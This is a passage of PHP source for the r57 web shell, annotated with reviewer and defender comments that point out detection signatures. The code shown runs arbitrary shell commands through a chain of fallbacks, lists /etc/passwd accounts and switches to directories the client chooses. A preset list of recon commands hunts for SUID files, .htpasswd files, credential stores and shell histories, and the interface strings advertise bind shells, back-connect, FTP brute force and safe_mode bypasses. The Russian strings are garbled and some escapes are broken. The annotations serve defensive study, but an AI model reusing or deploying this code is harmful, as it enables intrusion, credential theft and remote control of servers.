// null -> 'NULL', arrays/objects -> print_r() text; the result is escaped and wrapped by
// U_wordwrap(). Because the loose == '' test comes first, null and false are reported as
// 'no value' before the later branches can run.
function U_value($value)
  {
  if ($value == '') return '<i>no value</i>';
  if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
  if ($value === null) return 'NULL';
  if (@is_object($value)) $value = (array) $value;
  if (@is_array($value))
  {
  @ob_start();
  print_r($value);
  $value = @ob_get_contents();
  @ob_end_clean();
  }
  return U_wordwrap((string) $value);
  }
// HTML-escapes $str and inserts <wbr /> break hints every 100 characters; the regex then moves
// any hint that landed inside an &...; entity to just after that entity.
function U_wordwrap($str)
  {
  $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
  return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
  }
if (@function_exists('ini_get_all'))
  {
  $r = '';
  echo '<table width=100%>', '<tr><td bgcolor=#3A6EA5><font face=Verdana size=-2
color=orange><div align=center><b>Directive</b></div></font></td><td
bgcolor=#3A6EA5><font face=Verdana size=-2 color=orange><div align=center><b>Local
Value</b></div></font></td><td bgcolor=#3A6EA5><font face=Verdana size=-2
color=orange><div align=center><b>Master Value</b></div></font></td></tr>';
  foreach (@ini_get_all() as $key=>$value)
    {
    $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.
$key.'</b></font></td><td><font face=Verdana size=-2><div
align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font
face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></
div></font></td></tr>';
    }
  echo $r;
  echo '</table>';
  }
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".
$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
die();
}
// GET ?cpu : shows processor information as an HTML table, then stops.
// Each line of the file is split on ':' into a name and a value; a missing value is shown
// as '---'. The file content is written into the page without HTML escaping.
// NOTE(review): as printed the file is opened by the relative name "cpuinfo", so it is looked
// up in the script's working directory - confirm against an original copy.
// $r is appended to without being initialised in this handler. ws() is defined outside the
// visible part of the file.
if(isset($_GET['cpu']))
  {
      echo $head;
      echo '<table width=100%><tr><td bgcolor=#3A6EA5><div align=center><font
face=Verdana size=-2 color=orange><b>CPU</b></font></div></td></tr></table><table
width=100%>';
   $cpuf = @file("cpuinfo");
   if($cpuf)
    {
      $c = @sizeof($cpuf);
      for($i=0;$i<$c;$i++)
        {
          $info = @explode(":",$cpuf[$i]);
          if($info[1]==""){ $info[1]="---"; }
          $r .= '<tr><td>'.ws(3).'<font face=Verdana
size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div
align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
        }
      echo $r;
    }
   else
    {
      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> ---
</b></font></div></td></tr>';
    }
   echo '</table>';
   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".
$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
   die();
 }
// GET ?mem : shows memory information as an HTML table, then stops. Same structure as the
// ?cpu handler: each line is split on ':' into a name and a value, a missing value is shown
// as '---', and the content is written into the page without HTML escaping.
// NOTE(review): as printed the file is opened by the relative name "meminfo", so it is looked
// up in the script's working directory - confirm against an original copy.
// $r is appended to without being initialised in this handler. ws() is defined outside the
// visible part of the file.
if(isset($_GET['mem']))
 {
   echo $head;
   echo '<table width=100%><tr><td bgcolor=#3A6EA5><div align=center><font
face=Verdana size=-2
color=orange><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
   $memf = @file("meminfo");
   if($memf)
    {
      $c = sizeof($memf);
      for($i=0;$i<$c;$i++)
        {
          $info = explode(":",$memf[$i]);
          if($info[1]==""){ $info[1]="---"; }
          $r .= '<tr><td>'.ws(3).'<font face=Verdana
size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div
align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
        }
      echo $r;
    }
   else
    {
      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> ---
</b></font></div></td></tr>';
    }
   echo '</table>';
   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".
$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
   die();
 }
$lang=array(
'ru_text1' =>'ÃEûïîëÃÃ¥ÃÃà ÿ êîìà Ãäà ',
'ru_text2' =>'ÃEûïîëÃÃ¥Ãèå êîìà Ãä Ãà ñåðâåðå',
'ru_text3' =>'Ã'ûïîëÃèòü êîìà Ãäó',
'ru_text4' =>'Ðà áî÷à ÿ äèðåêòîðèÿ',
'ru_text5' =>'Çà ãðóçêà åà éëîâ Ãà ñåðâåð',
'ru_text6' =>'Ëîêà ëüÃûé åà éë',
'ru_text7' =>'Àëèà ñû',
'ru_text8' =>'Àûáåðèòå à ëèà ñ',
'ru_butt1' =>'ÀûïîëÃèòü',
'ru_butt2' =>'Çà ãðóçèòü',
'ru_text9' =>'Îòêðûòèå ïîðòà è ïðèâÿçêà åãî ê /bin/bash',
'ru_text10'=>'Îòêðûòü ïîðò',
'ru_text11'=>'Ïà ðîëü äëÿ äîñòóïà ',
'ru_butt3' =>'Îòêðûòü',
'ru_text12'=>'back-connect',
'ru_text13'=>'IP-à äðåñ',
'ru_text14'=>'Ïîðò',
'ru_butt4' =>'ÏûïîëÃèòü',
'ru_text15'=>'Çà ãðóçêà åà éëîâ ñ óäà ëåÃÃîãî ñåðâåðà ',
'ru_text16'=>'Èñïîëüçîâà òü',
'ru_text17'=>'Óäà ëåÃÃûé åà éë',
'ru_text18'=>'Ëîêà ëüÃûé åà éë',
'ru_text19'=>'Exploits',
'ru_text20'=>'Èñïîëüçîâà òü',
'ru_text21'=>'Íîâîå èìÿ',
'ru_text22'=>'datapipe',
'ru_text23'=>'Ëîêà ëüÃûé ïîðò',
'ru_text24'=>'Óäà ëåÃÃûé õîñò',
'ru_text25'=>'Óäà ëåÃÃûé ïîðò',
'ru_text26'=>'Èñïîëüçîâà òü',
'ru_butt5' =>'Çà ïóñòèòü',
'ru_text28'=>'Ðà áîòà â safe_mode',
'ru_text29'=>'Äîñòóï çà ïðåùåÃ',
'ru_butt6' =>'ÑìåÃèòü',
'ru_text30'=>'Ïðîñìîòð åà éëà ',
'ru_butt7' =>'Ïûâåñòè',
'ru_text31'=>'Ôà éë ÃÃ¥ Ãà éäåÃ',
'ru_text32'=>'ÔûïîëÃÃ¥Ãèå PHP êîäà ',
'ru_text33'=>'Ïðîâåðêà âîçìîæÃîñòè îáõîäà îãðà Ãè÷åÃ-
èé open_basedir ÷åðåç åóÃêöèè cURL',
'ru_butt8' =>'Ïðîâåðèòü',
'ru_text34'=>'Ïðîâåðêà âîçìîæÃîñòè îáõîäà îãðà Ãè÷åÃ-
èé safe_mode ÷åðåç åóÃêöèþ include',
'ru_text35'=>'Ïðîâåðêà âîçìîæÃîñòè îáõîäà îãðà Ãè÷åÃ-
èé safe_mode ÷åðåç çà ãðóçêó åà éëà â mysql',
'ru_text36'=>'Áà çà . Òà áëèöà ',
'ru_text37'=>'ËîãèÃ',
'ru_text38'=>'Ïà ðîëü',
'ru_text39'=>'Áà çà ',
'ru_text40'=>'Äà ìï òà áëèöû áà çû äà ÃÃûõ',
'ru_butt9' =>'Äà ìï',
'ru_text41'=>'Ñîõðà Ãèòü â åà éëå',
'ru_text42'=>'Ðåäà êòèðîâà Ãèå åà éëà ',
'ru_text43'=>'Ðåäà êòèðîâà òü åà éë',
'ru_butt10'=>'Ñîõðà Ãèòü',
'ru_butt11'=>'Ðåäà êòèðîâà òü',
'ru_text44'=>'Ðåäà êòèðîâà Ãèå åà éëà ÃåâîçìîæÃî!
Äîñòóï òîëüêî äëÿ ÷òåÃèÿ!',
'ru_text45'=>'Ôà éë ñîõðà ÃÃ¥Ã',
'ru_text46'=>'Ïðîñìîòð phpinfo()',
'ru_text47'=>'Ïðîñìîòð Ãà ñòðîåê php.ini',
'ru_text48'=>'Óäà ëåÃèå âðåìåÃÃûõ åà éëîâ',
'ru_text49'=>'Óäà ëåÃèå ñêðèïòà ñ ñåðâåðà ',
'ru_text50'=>'ÈÃåîðìà öèÿ î ïðîöåññîðå',
'ru_text51'=>'ÈÃåîðìà öèÿ î ïà ìÿòè',
'ru_text52'=>'Òåêñò äëÿ ïîèñêà ',
'ru_text53'=>'Èñêà òü â ïà ïêå',
'ru_text54'=>'Ïîèñê òåêñòà â åà éëà õ',
'ru_butt12'=>'Íà éòè',
'ru_text55'=>'Òîëüêî â åà éëà õ',
'ru_text56'=>'Íè÷åãî ÃÃ¥ Ãà éäåÃî',
'ru_text57'=>'Ñîçäà òü/Óäà ëèòü Ôà éë/Äèðåêòîðèþ',
'ru_text58'=>'Èìÿ',
'ru_text59'=>'Ôà éë',
'ru_text60'=>'Äèðåêòîðèþ',
'ru_butt13'=>'Ñîçäà òü/Óäà ëèòü',
'ru_text61'=>'Ôà éë ñîçäà Ã',
'ru_text62'=>'Äèðåêòîðèÿ ñîçäà Ãà ',
'ru_text63'=>'Ôà éë óäà ëåÃ',
'ru_text64'=>'Äèðåêòîðèÿ óäà ëåÃà ',
'ru_text65'=>'Ñîçäà òü',
'ru_text66'=>'Óäà ëèòü',
'ru_text67'=>'Chown/Chgrp/Chmod',
'ru_text68'=>'Êîìà Ãäà ',
'ru_text69'=>'Ïà ðà ìåòð1',
'ru_text70'=>'Ïà ðà ìåòð2',
'ru_text71'=>"Ïòîðîé ïà ðà ìåòð êîìà Ãäû:rn- äëÿ CHOWN -
èìÿ Ãîâîãî ïîëüçîâà òåëÿ èëè åãî UID (÷èñëîì) rn-
äëÿ êîìà Ãäû CHGRP - èìÿ ãðóïïû èëè GID (÷èñëîì) rn-
äëÿ êîìà Ãäû CHMOD - öåëîå ÷èñëî â âîñüìåðè÷Ãîì ïÃ
°Ã¥Ã¤Ã±Ã²Ã âëåÃèè (Ãà ïðèìåð 0777)",
'ru_text72'=>'Òåêñò äëÿ ïîèñêà ',
'ru_text73'=>'Èñêà òü â ïà ïêå',
'ru_text74'=>'Èñêà òü â åà éëà õ',
'ru_text75'=>'* ìîæÃî èñïîëüçîâà òü ðåãóëÿðÃîå âûÃ
°Ã æåÃèå',
'ru_text76'=>'Ïîèñê òåêñòà â åà éëà õ ñ ïîìîùüþ
óòèëèòû find',
'ru_text80'=>'Òèï',
'ru_text81'=>'Ñåòü',
'ru_text82'=>'Áà çû äà ÃÃûõ',
'ru_text83'=>'ÁûïîëÃÃ¥Ãèå SQL çà ïðîñà ',
'ru_text84'=>'SQL çà ïðîñ',
'ru_text85'=>'Ïðîâåðêà âîçìîæÃîñòè îáõîäà îãðà Ãè÷åÃ-
èé safe_mode ÷åðåç âûïîëÃÃ¥Ãèå êîìà Ãä â MSSQL ñåðâåðå',
'ru_text86'=>'Ñêà ÷èâà Ãèå åà éëà ñ ñåðâåðà ',
'ru_butt14'=>'Ñêà ÷à òü',
'ru_text87'=>'Ñêà ÷èâà Ãèå åà éëîâ ñ óäà ëåÃÃîãî ftp-ñåðÃ
¢Ã¥Ã°Ã ',
'ru_text88'=>'FTP-ñåðâåð:ïîðò',
'ru_text89'=>'Ôà éë Ãà ftp ñåðâåðå',
'ru_text90'=>'Ðåæèì ïåðåäà ÷è',
'ru_text91'=>'Àðõèâèðîâà òü â',
'ru_text92'=>'áåç à ðõèâà öèè',
'ru_text93'=>'FTP',
'ru_text94'=>'FTP-áðóòåîðñ',
'ru_text95'=>'Ñïèñîê ïîëüçîâà òåëåé',
'ru_text96'=>'Íå óäà ëîñü ïîëó÷èòü ñïèñîê ïîëüçîÃ
¢Ã òåëåé',
'ru_text97'=>'ÏðîâåðåÃî êîìáèÃà öèé: ',
'ru_text98'=>'Óäà ÷Ãûõ ïîäêëþ÷åÃèé: ',
'ru_text99'=>'* â êà ÷åñòâå ëîãèÃà è ïà ðîëÿ
èñïîëüçóåòñÿ èìÿ ïîëüçîâà òåëÿ èç /etc/passwd',
'ru_text100'=>'Îòïðà âêà åà éëîâ Ãà óäà ëåÃÃûé åòï ñåðÃ
¢Ã¥Ã°',
'ru_text101'=>'Èñïîëüçîâà òü òà êæå ïåðåâåðÃóòîå (user ->
resu) èìÿ ïîëüçîâà òåëÿ â êà ÷åñòâå ïà ðîëÿ',
'ru_text102'=>'Ïî÷òà ',
'ru_text103'=>'Îòïðà âêà ïèñüìà ',
'ru_text104'=>'Îòïðà âêà åà éëà Ãà ïî÷òîâûé ÿùèê',
'ru_text105'=>'Êîìó',
'ru_text106'=>'Îò',
'ru_text107'=>'Òåìà ',
'ru_butt15'=>'Îòïðà âèòü',
'ru_text108'=>'Òåêñò ïèñüìà ',
'ru_text109'=>'ÑâåðÃóòü',
'ru_text110'=>'Ðà çâåðÃóòü',
'ru_text111'=>'SQL-Ñåðâåð : ïîðò',
'ru_text112'=>'Ïðîâåðêà âîçìîæÃîñòè îáõîäà îãðà Ã-
è÷åÃèé safe_mode ÷åðåç èñïîëüçîâà Ãèå åóÃêöèè
mb_send_mail',
'ru_text113'=>'Ïðîâåðêà âîçìîæÃîñòè îáõîäà îãðà Ã-
è÷åÃèé safe_mode, ïðîñìîòð ëèñòèÃãà äèðåêòîðèé ñ
èñïîëüçîâà Ãèåì imap_list',
'ru_text114'=>'Ïðîâåðêà âîçìîæÃîñòè îáõîäà îãðà Ã-
è÷åÃèé safe_mode, ïðîñìîòð ñîäåðæèìîãî åà éëà ñ
èñïîëüçîâà Ãèåì imap_body',
/* --------------------------------------------------------------- */
'eng_text1' =>'Komut uygula',
'eng_text2' =>'Server uzerinde komut uygula',
'eng_text3' =>'Komut calistir',
'eng_text4' =>'Bulunan dizin',
'eng_text5' =>'Servera dosya yukle',
'eng_text6' =>'Yerel dosya',
'eng_text7' =>'Aliases',
'eng_text8' =>'Select alias',
'eng_butt1' =>'Uygula',
'eng_butt2' =>'Yukle',
'eng_text9' =>'Bind port to /bin/bash',
'eng_text10'=>'Port',
'eng_text11'=>'Password for access',
'eng_butt3' =>'Bind',
'eng_text12'=>'Arka kapi',
'eng_text13'=>'IP',
'eng_text14'=>'Port',
'eng_butt4' =>'Baglanti',
'eng_text15'=>'Uzak serverdan dosya yukle',
'eng_text16'=>'Ile',
'eng_text17'=>'Remote file',
'eng_text18'=>'Local file',
'eng_text19'=>'Exploits',
'eng_text20'=>'Kullan',
'eng_text21'=>'&nbsp;New name',
'eng_text22'=>'datapipe',
'eng_text23'=>'Local port',
'eng_text24'=>'Remote host',
'eng_text25'=>'Remote port',
'eng_text26'=>'Kullan',
'eng_butt5' =>'Calistir',
'eng_text28'=>'Su anki durum safe_mode',
'eng_text29'=>'ACCESS DENIED',
'eng_butt6' =>'Degistir',
'eng_text30'=>'Cat file',
'eng_butt7' =>'Goster',
'eng_text31'=>'Dosya bulunamadi',
'eng_text32'=>'Eval PHP code',
'eng_text33'=>'Test bypass open_basedir with cURL functions',
'eng_butt8' =>'Test',
'eng_text34'=>'Test bypass safe_mode with include function',
'eng_text35'=>'Test bypass safe_mode with load file in mysql',
'eng_text36'=>'Database . Tablo',
'eng_text37'=>'Giris',
'eng_text38'=>'Sifre',
'eng_text39'=>'Database',
'eng_text40'=>'Bosaltilacak database tablosu',
'eng_butt9' =>'Bosalt',
'eng_text41'=>'Bosaltilan dosyayi kaydet',
'eng_text42'=>'Dosyalari duzenle',
'eng_text43'=>'Dosya duzenle',
'eng_butt10'=>'Kaydet',
'eng_text44'=>'Duzenlenemiyor! Sadece okunuyor!',
'eng_text45'=>'Dosya kaydedildi',
'eng_text46'=>'Goster phpinfo()',
'eng_text47'=>'Degiskenleri goster php.ini',
'eng_text48'=>'Temp doslarini sil',
'eng_butt11'=>'Duzenle',
'eng_text49'=>'Serverdan script sil',
'eng_text50'=>'Islemci bilgisine bak',
'eng_text51'=>'Hafýza bilgisine bak',
'eng_text52'=>'Metin ara',
'eng_text53'=>'In dirs',
'eng_text54'=>'Dosyalarin icinde metin ara',
'eng_butt12'=>'Ara',
'eng_text55'=>'Dosyalarda',
'eng_text56'=>'Hicbirsey :(',
'eng_text57'=>'Yarat/Dosya sil/Dir',
'eng_text58'=>'isim',
'eng_text59'=>'dosya',
'eng_text60'=>'dir',
'eng_butt13'=>'Yarat/Sil',
'eng_text61'=>'Dosya yaratildi',
'eng_text62'=>'Dir created',
'eng_text63'=>'Dosya silindi',
'eng_text64'=>'Dir deleted',
'eng_text65'=>'Yarat',
'eng_text66'=>'Sil',
'eng_text67'=>'Chown/Chgrp/Chmod',
'eng_text68'=>'Komut',
'eng_text69'=>'param1',
'eng_text70'=>'param2',
'eng_text71'=>"Second commands param is:rn- for CHOWN - name of new owner or UID
rn- for CHGRP - group name or GIDrn- for CHMOD - 0777, 0755...",
'eng_text72'=>'Metin icin ara',
'eng_text73'=>'Klasor icin ara',
'eng_text74'=>'Dosyalarin icinde ara',
'eng_text75'=>'* you can use regexp',
'eng_text76'=>'Search text in files via find',
'eng_text80'=>'Type',
'eng_text81'=>'Net',
'eng_text82'=>'Databases',
'eng_text83'=>'SQL da sorgula',
'eng_text84'=>'SQL sor',
'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
'eng_text86'=>'Serverdan dosya indir',
'eng_butt14'=>'Indir',
'eng_text87'=>'Uzak ftp sunucusundan doysa indir',
'eng_text88'=>'FTP-server:port',
'eng_text89'=>'Ftp de dosya',
'eng_text90'=>'Transfer modu',
'eng_text91'=>'Arsivleme',
'eng_text92'=>'without archivation',
'eng_text93'=>'FTP',
'eng_text94'=>'FTP-bruteforce',
'eng_text95'=>'Kullanici listesi',
'eng_text96'=>'Can't get users list',
'eng_text97'=>'checked: ',
'eng_text98'=>'success: ',
'eng_text99'=>'* kullanici isimlerinde /etc/passwd for ftp Giris ve sifre',
'eng_text100'=>'Uzak ftp sunucusuna dosya yolla',
'eng_text101'=>'Use reverse (user -> resu) login for password',
'eng_text102'=>'Mail',
'eng_text103'=>'Mail yolla',
'eng_text104'=>'Dosyayi maile yolla',
'eng_text105'=>'To',
'eng_text106'=>'From',
'eng_text107'=>'Subj',
'eng_butt15'=>'Yolla',
'eng_text108'=>'Mail',
'eng_text109'=>'Hide',
'eng_text110'=>'Goster',
'eng_text111'=>'SQL-Server : Port',
'eng_text112'=>'Test bypass safe_mode with function mb_send_mail',
'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list',
'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body',
);
/*
Command aliases
They save retyping the same commands over and over. ( Made thanks to my natural laziness )
You can add or change the commands yourself.
*/
/* Preset command lines keyed by a human-readable label (label => shell command).
   The code that consumes $aliases is outside this block; presumably the labels are offered
   for selection in the UI (see the 'Select alias' string in $lang) - confirm at the call site.
   Every entry is local reconnaissance: SUID/SGID binaries, world-writable files and
   directories, application config files, credential stores (.htpasswd, service.pwd),
   shell and MySQL history, .fetchmailrc, ext2 file attributes and listening sockets.
   Defender note: these command lines are fixed strings, so a `find / -type f -perm -04000 -ls`
   or `find / -type f -name .htpasswd` whose parent process is the web server / PHP worker is a
   strong post-compromise signal in process-creation or auditd logs, and the label/command
   pairs themselves are usable content signatures when scanning web roots.
   The last entry uses a row of dashes as its label and maps it to `ls -la`. */
$aliases=array(
'find suid files'=>'find / -type f -perm -04000 -ls',
'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
'find config.inc.php files'=>'find / -type f -name config.inc.php',
'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
'find config* files'=>'find / -type f -name "config*"',
'find config* files in current dir'=>'find . -type f -name "config*"',
'find all writable files'=>'find / -type f -perm -2 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories'=>'find / -type d -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files'=>'find / -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'find all service.pwd files'=>'find / -type f -name service.pwd',
'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
'find all .htpasswd files'=>'find / -type f -name .htpasswd',
'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
'find all .bash_history files'=>'find / -type f -name .bash_history',
'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
'find all .mysql_history files'=>'find / -type f -name .mysql_history',
'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
'list file attributes on a Linux second extended file system'=>'lsattr -va',
'show opened ports'=>'netstat -an | grep -i listen',
'----------------------------------------------------------------------------------
------------------'=>'ls -la'
);
/* Static HTML fragments (table rows, brackets, font, form open/close) that the rest of the
   script concatenates into its output. $fs opens a POST form with no action attribute, so
   submissions go back to the script's own URL.
   Defender note: the fixed markup (bgcolor=#3A6EA5, "face=Verdana size=-2", class=table1)
   recurs throughout this file and is usable as a content signature for file scanning. */
$table_up1 = "<tr><td bgcolor=#3A6EA5><font face=Verdana size=-2><b><div
align=center>:: ";
$table_up2 = " ::</div></b></font></td></tr><tr><td>";
$table_up3 = "<table width=100% cellpadding=0 cellspacing=0
bgcolor=#000000><tr><td bgcolor=#3A6EA5>";
$table_end1 = "</td></tr>";
$arrow = " <font face=Wingdings color=gray>è</font>";
$lb = "<font color=black>[</font>";
$rb = "<font color=black>]</font>";
$font = "<font face=Verdana size=-2>";
$ts = "<table class=table1 width=100% align=center>";
$te = "</table>";
$fs = "<form name=form method=POST>";
$fe = "</form>";

/* Handler for the bare `?users` query key: prints the names returned by get_users()
   (first field of each /etc/passwd line), one per line, then a BACK link, and ends the
   request with die(). When get_users() returns a falsy value the localized "_text96"
   message is printed instead.
   Defender note: a GET with `users` as a query key against an unexpected .php file, answered
   with a list of local account names, is a simple web-log / response-body indicator.
   NOTE(review): $_SERVER['PHP_SELF'] and the account names are echoed without HTML escaping. */
if(isset($_GET['users']))
 {
 if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=orange>".
$lang[$language.'_text96']."</font></center>"; }
 else
   {
   echo '<center>';
   foreach($users as $user) { echo $user."<br>"; }
   echo '</center>';
   }
 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".
$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
 }

/* Working directory and platform detection.
   The request-supplied POST field `dir` is passed straight to chdir() (errors suppressed), so
   every later relative path in the request resolves against a directory chosen by the client. */
if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
$dir = @getcwd();
$windows = 0;
$unix = 0;
/* A second character of ":" in the cwd (drive-letter form) is treated as Windows, anything else as unix. */
if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
/* Fallback when getcwd() returned nothing: use the OS environment variable, then php_uname().
   NOTE(review): the line above has already set $unix=1 in this case, so a "win" match here
   leaves both flags set.
   eregi() was removed in PHP 7.0, which dates this code to PHP 4/5 runtimes. */
if(empty($dir))
 {
 $os = getenv('OS');
 if(empty($os)){ $os = php_uname(); }
 if(empty($os)){ $os ="-"; $unix=1; }
 else
    {
    if(@eregi("^win",$os)) { $windows = 1; }
    else { $unix = 1; }
    }
 }
/* Handler for POST cmd=search_text: searches the files under s_dir for s_text and prints the
   matching lines grouped by file, then ends the request with die().
   - s_dir and s_text come straight from the request; s_mask is only used when `m` is also set.
   - SearchResult (defined later in this file) does the directory walk and the regex matching.
   Defender note: where request bodies are logged (WAF / audit logs), the field names
   cmd=search_text, s_dir, s_text, s_mask and m identify this feature.
   NOTE(review): file names ($file) are written into the HTML without escaping.
   NOTE(review): str_replace("/","",$file) on Windows and the "</TR>n" suffix look like they
   lost a backslash in page extraction - compare against a clean sample before relying on them. */
if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) &&
$_POST['cmd'] == "search_text")
    {
        echo $head;
        if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new
SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
        else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
        $sr->SearchText(0,0);
        $res = $sr->GetResultFiles();
        $found = $sr->GetMatchesCount();
        $titles = $sr->GetTitles();
        $r = "";
        if($found > 0)
        {
          $r .= "<TABLE width=100%>";
          // $res maps file name => (line number => highlighted line text)
          foreach($res as $file=>$v)
          {
             $r .= "<TR>";
             $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
             $r .= ($windows)? str_replace("/","",$file) : $file;
             $r .= "</b></font></ TD>";
             $r .= "</TR>";
             foreach($v as $a=>$b)
             {
               $r .= "<TR>";
               $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></
TD>";
               $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
               $r .= "</TR>n";
             }
          }
          $r .= "</TABLE>";
        echo $r;
        }
        else
        {
          // no matches: print the localized "_text56" message
          echo "<P align=center><B><font face=Verdana size=-2>".
$lang[$language.'_text56']."</B></font></P>";
        }
    echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".
$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
    die();
    }
/* Command-execution self-test: runs the fixed command `echo abcr57` through ex() and sets
   $safe_mode = 1 unless "r57" is found at offset 3 of the output (i.e. unless the command
   really ran and echoed back).
   Defender note: the literal command line `echo abcr57` spawned by the web server / PHP worker
   is a distinctive process-creation indicator for this family. */
if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
/* Web server identification from the environment, "-" when unavailable. */
$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
/**
 * Returns $i copies of the "&nbsp;" entity, used as horizontal padding in the HTML output.
 *
 * @param int $i number of repetitions
 * @return string
 */
function ws($i)
{
return @str_repeat("&nbsp;",$i);
}
/**
 * Runs an operating-system command line and returns what it printed.
 *
 * This is the script's command-execution primitive. It uses the first of exec(),
 * shell_exec(), system(), passthru() that function_exists() reports, and falls back to
 * popen() when none of them is available. An empty $cfe returns '' without running anything.
 * Every call is @-suppressed, so failures produce no PHP warning.
 *
 * Defender notes: because of the fallback chain, restricting only some of these functions in
 * php.ini `disable_functions` leaves a later branch usable; review the five together.
 * At run time each branch shows up as the web server / PHP worker spawning a shell child
 * process, which is the behaviour to alert on.
 *
 * NOTE(review): join("n",$res) presumably read "\n" before the backslash was lost in page
 * extraction; as printed, output lines would be joined with the letter n.
 *
 * @param string $cfe command line, passed to the shell unmodified
 * @return mixed captured output ('' when $cfe is empty or no branch ran)
 */
function ex($cfe)
{
  $res = '';
  if (!empty($cfe))
  {
    if(function_exists('exec'))
      {
        // exec() fills $res with an array of output lines, joined into one string below
        @exec($cfe,$res);
        $res = join("n",$res);
}
  elseif(function_exists('shell_exec'))
    {
      $res = @shell_exec($cfe);
    }
  elseif(function_exists('system'))
    {
      // system() prints directly, so the output is captured with an output buffer
      @ob_start();
      @system($cfe);
      $res = @ob_get_contents();
      @ob_end_clean();
    }
  elseif(function_exists('passthru'))
    {
      // same buffering approach as the system() branch
      @ob_start();
      @passthru($cfe);
      $res = @ob_get_contents();
      @ob_end_clean();
    }
  elseif(@is_resource($f = @popen($cfe,"r")))
  {
    // last resort: read the command's stdout from a pipe in 1024-byte chunks
    $res = "";
    while(!@feof($f)) { $res .= @fread($f,1024); }
    @pclose($f);
  }
 }
 return $res;
}
/**
 * Lists local account names by reading /etc/passwd.
 *
 * Takes the text before the first ":" of every line that does not start with "#".
 * Defender note: a read of /etc/passwd by the PHP worker is normal for some applications, so
 * this is weak on its own; it gains weight next to the `?users` request that triggers it.
 *
 * @return array|int list of names, or 0 when file() returns a falsy value
 *                   (unreadable or empty file)
 */
function get_users()
{
  $users = array();
  $rows=file('/etc/passwd');
  if(!$rows) return 0;
  foreach ($rows as $string)
   {
      $user = @explode(":",$string);
      if(substr($string,0,1)!='#') array_push($users,$user[0]);
   }
  return $users;
}
function we($i)
{
if($GLOBALS['language']=="ru"){ $text = 'Îøèáêà ! Íå ìîãó
çà ïèñà òü â åà éë '; }
else { $text = "[-] ERROR! Can't write in file "; }
echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#3A6EA5><font
color=orange face=Verdana size=-2><div align=center><b>".$text.
$i."</b></div></font></td></tr></table>";
return null;
}
function re($i)
{
if($GLOBALS['language']=="ru"){ $text = 'Îøèáêà ! Íå ìîãó ïÃ
°Ã®Ã·Ã¨Ã²Ã òü åà éë '; }
else { $text = "[-] ERROR! Can't read file "; }
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td
bgcolor=#3A6EA5><font color=orange face=Verdana size=-2><div align=center><b>".
$text.$i."</b></div></font></td></tr></table>";
return null;
}
function ce($i)
{
if($GLOBALS['language']=="ru"){ $text = "Íå óäà ëîñü ñîçäà òü "; }
else { $text = "Can't create "; }
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td
bgcolor=#3A6EA5><font color=orange face=Verdana size=-2><div align=center><b>".
$text.$i."</b></div></font></td></tr></table>";
return null;
}
function fe($l,$n)
{
$text['ru'] = array('Íå óäà ëîñü ïîäêëþ÷èòüñÿ ê ftp ñåðÃ
¢Ã¥Ã°Ã³','Îøèáêà à âòîðèçà öèè Ãà ftp ñåðâåðå','Íå
óäà ëîñü ïîìåÃÿòü äèðåêòîðèþ Ãà ftp ñåðâåðå');
$text['eng'] = array('Connect to ftp server failed','Login to ftp server
failed','Can't change dir on ftp server');
